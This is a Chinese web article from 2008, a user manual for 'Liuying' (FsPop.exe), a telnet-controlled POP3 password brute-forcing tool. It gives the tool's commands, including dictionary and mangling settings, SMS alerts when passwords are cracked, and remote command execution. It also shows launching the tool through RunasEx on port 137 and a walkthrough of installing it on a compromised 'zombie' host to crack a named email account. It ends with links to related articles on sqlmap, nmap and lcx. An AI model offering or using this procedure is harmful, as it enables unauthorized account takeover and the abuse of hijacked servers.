流影使用說(shuō)明
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 22:13:05 作者:佚名
我要評(píng)論

一、流影簡(jiǎn)介流影是一個(gè)和流光功能相似的工具,和流光最大的不同在于,流光是運(yùn)行于用戶主機(jī)也就是客戶端的,是一個(gè)圖形界面的工具,而流影可以同時(shí)運(yùn)行于服務(wù)器端和客戶端的工具。用戶可以通過(guò)telnet來(lái)進(jìn)行遠(yuǎn)程管理和控制。二、控制命令流影的全部設(shè)置通過(guò)Telnet來(lái)進(jìn)
一、流影簡(jiǎn)介流影是一個(gè)和流光功能相似的工具,和流光最大的不同在于,流光是運(yùn)行于用戶主機(jī)也就是客戶端的,是一個(gè)圖形界面的工具,而流影可以同時(shí)運(yùn)行于服務(wù)器端和客戶端的工具。用戶可以通過(guò)telnet來(lái)進(jìn)行遠(yuǎn)程管理和控制。二、控制命令流影的全部設(shè)置通過(guò)Telnet來(lái)進(jìn)行,采用命令行方式。Set Server <POP3 Server> 設(shè)置探測(cè)的POP3服務(wù)器,如:Set Server pop.21cn.comSet User <Username>|<File: User List File>|<Scheme: User Scheme File> 設(shè)置需要探測(cè)的用戶名、用戶列表文件或用戶方案文件,關(guān)于用戶列表文件及用戶方案文件的詳細(xì)解釋參閱[流光]的說(shuō)明文件。如:Set User Victim, Set User File:c:\password.dic, Set User Scheme: user.schSet Password <Password>|<Dictionary File>|<Dictionary Scheme File> 設(shè)置探測(cè)時(shí)采用的密碼、密碼字典或密碼程序方案。如:Set Password 123456, Set Password File: Password.dic, Set Password Scheme: Pass.SchRun 開(kāi)始探測(cè)Stat 查看當(dāng)前運(yùn)行的情況Set Singlemode <ON>|<OFF> 開(kāi)啟/關(guān)閉簡(jiǎn)單模式,如果簡(jiǎn)單模式開(kāi)啟會(huì)自動(dòng)用相同的用戶名作為密碼探測(cè)一次。Show Result <Current>|<Total> 查看已經(jīng)探測(cè)出的本次密碼或所有密碼記錄Stop 停止當(dāng)前探測(cè)。Set Suffix <NULL>|<Suffix Word> 設(shè)置是否自動(dòng)在每一個(gè)密碼后加指定的后綴。如:Set Suffix 123,即在每一個(gè)密碼后自動(dòng)加后綴123。Ex:pass->pass123Set Prefix <NULL>|<Prefix Word> 設(shè)置是否自動(dòng)在每一個(gè)密碼后加指定的前綴。如:Set Prefix 123,即在每一個(gè)密碼前自動(dòng)加前綴123,Ex:pass->123passSet Gsm <NULL>|<GSM ID> ET:<Freq> 設(shè)置需要發(fā)送短消息的手機(jī)號(hào)碼。如:Set GSM 13900101234 ET00,設(shè)置號(hào)碼為13900101234,每探測(cè)出100個(gè)密碼及發(fā)送一次。注意:必須是中國(guó)移動(dòng)的手機(jī),而且已經(jīng)開(kāi)通了短信息服務(wù)。Set Sms <Message> 短消息發(fā)送,用于測(cè)試短消息的發(fā)送,發(fā)送的號(hào)碼為Set Gsm指定的號(hào)碼。Change Password <New Password> 改變登陸的密碼Cmd [/display] <Cmd> 執(zhí)行制定的程序,[display]選項(xiàng)用于指定是否顯示執(zhí)行的輸出結(jié)果。如:Cmd /display dirQuit 退出Telnet控制端。ShutDown 結(jié)束流影的運(yùn)行。三、啟動(dòng)如果是在本地運(yùn)行,直接鍵入如下命令即可:FsPop.exe <Port> <Control Password> [/Verbose]Port: 流影開(kāi)啟的端口,此端口可以和已經(jīng)開(kāi)啟的端口重用,例如和端口137重用。Control Password: 每一次用Telnet連接流影時(shí)的密碼,最多8位。/Verbose: 本地輸出模式,如果打開(kāi)此選項(xiàng),可以在運(yùn)行時(shí)看到掃描的過(guò)程,不建議在遠(yuǎn)程使用。如果在遠(yuǎn)程啟動(dòng),首先用SRV開(kāi)啟的端口登陸,之后需要用RunasEx來(lái)創(chuàng)建流影的進(jìn)程,如:RunasEx administrator password "c:\winnt\system32\FsPop.exe 137 123456" 建議在本地使用熟練后,再放到遠(yuǎn)程運(yùn)行。四、一個(gè)典型的例子第一部需要做的當(dāng)然是搞到一部肉雞,經(jīng)過(guò)用[流光2000]的探測(cè),我們找到了一個(gè)肉雞192.168.16.1(為了便于舉例,此處是我在局域網(wǎng)中一臺(tái)機(jī)器)。1、復(fù)制一些必要的文件上去2、啟動(dòng)srv進(jìn)程,登陸3、利用RunasEx創(chuàng)建Fspop.exe進(jìn)程從上面可以看到,進(jìn)程創(chuàng)建成功?,F(xiàn)在我們可以來(lái)控制流影作一些事情了。我們需要破解一個(gè)帳號(hào)fybugang12@21cn.com(純屬虛構(gòu),請(qǐng)勿對(duì)號(hào)入座),在一般的字典破解無(wú)效后,決定采用一個(gè)比較大的方案來(lái)暴力破解,方案的文件名為user.sch,是2個(gè)字母加4個(gè)數(shù)字的組合。首先Telnet到流影開(kāi)啟的端口,在這個(gè)例子中是137,詳細(xì)過(guò)程參見(jiàn)下圖。需要說(shuō)明的一點(diǎn)是,由于我們僅僅設(shè)定了一個(gè)用戶,所以在設(shè)定手機(jī)短信息的發(fā)送頻率時(shí)設(shè)為1,即ET:1,也就是說(shuō)一旦掃描成功,就通過(guò)短信息通知。從上面用Stat命令可以看出,完成這一次掃描最多需要676萬(wàn)次探測(cè),通常在遠(yuǎn)程的掃描速度可以達(dá)到100萬(wàn)次/天,也就是說(shuō)可以在一周內(nèi)完成。當(dāng)開(kāi)始掃描后,我們就可以不必理會(huì)了,因?yàn)檫@一切都是在服務(wù)器上進(jìn)行的。------------------
相關(guān)文章
SQLMap簡(jiǎn)介及簡(jiǎn)單應(yīng)用實(shí)例圖文詳解
一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過(guò)插件,支持的數(shù)據(jù)庫(kù)是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測(cè)的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時(shí)可以用來(lái)作為一個(gè)漏洞探測(cè)器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見(jiàn)SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個(gè)注入工具,其實(shí)在注入工具方面,很多人都是通過(guò)這個(gè)工具實(shí)施的檢測(cè)與注入,對(duì)于我們從事安全防御的人來(lái)說(shuō),一定要引起注意,一般的程序員寫(xiě)的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì))
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì)),需要的朋友可以參考下2017-09-06Nmap備忘單 從探索到漏洞利用 第四章 繞過(guò)防火墻
這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測(cè)試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識(shí)以便2016-12-27- 眾所周知NMAP是經(jīng)常用來(lái)進(jìn)行端口發(fā)現(xiàn)、端口識(shí)別。除此之外我們還可以通過(guò)NMAP的NSE腳本做很多事情,比如郵件指紋識(shí)別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級(jí)NMAP掃描的技術(shù),我們將進(jìn)行一個(gè)中間人攻擊(MITM)。現(xiàn)在,游戲開(kāi)始了2016-12-27
- nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來(lái)掃描網(wǎng)上電腦開(kāi)放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個(gè)操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡(jiǎn)稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過(guò)網(wǎng)絡(luò)爬蟲(chóng)測(cè)試你的網(wǎng)站安全,檢測(cè)流行安全漏洞。倫敦時(shí)間2015年6月24日,官方發(fā)布了2016-09-28